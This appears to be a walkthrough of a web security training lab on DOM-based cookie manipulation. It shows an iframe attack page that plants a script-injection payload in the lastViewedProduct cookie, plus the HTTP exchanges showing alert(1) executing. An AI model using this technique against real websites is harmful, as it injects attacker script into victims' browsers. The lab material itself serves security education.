DOM XSS to cookie

If a source is read without any filtering and written straight into document.cookie, an attacker can control the cookie's contents.

For example, the target site uses a cookie named lastViewedProduct to store the URL of the last product page the user visited.

############## request ##############
GET /product?productId=1 HTTP/1.1
...omit...
Cookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=2

############## response ##############
...omit...
<a href='https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=2'>Last viewed product</a><p>|</p>
...omit...

The JavaScript that handles lastViewedProduct is shown below; the current URL is written into lastViewedProduct.

<script>
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>
<div class="is-linkback">
<a href="/">Return to list</a>
</div>

Prepare an attack page for the victim to visit, with the following content:

<iframe src="https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1&'><script>alert(1)</script>" onload="if(!window.x)this.src='https://ace51f041ea0fde18050178d00580093.web-security-academy.net';window.x=1;">

When the iframe loads for the first time, the browser briefly opens the malicious URL, and that URL is then stored in the lastViewedProduct cookie.

############## request ##############
GET /product?productId=1&%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
...omit...
Cookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1

############## response ##############
...omit...
<a href='https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1'>Last viewed product</a><p>|</p>
...omit...

The onload event handler then ensures the victim is immediately redirected to the home page, as follows:

############## request ##############
GET / HTTP/1.1
...omit...
Cookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1&%27%3E%3Cscript%3Ealert(1)%3C/script%3E

############## response ##############
...omit...
<a href='https://ace51f041ea0fde18050178d00580093.web-security-academy.net/product?productId=1&'><script>alert(1)</script>'>Last viewed product</a><p>|</p>
...omit...

Because the lastViewedProduct cookie value becomes part of the returned page, the client side executes <script>alert(1)</script>.

Lab: DOM-based cookie manipulation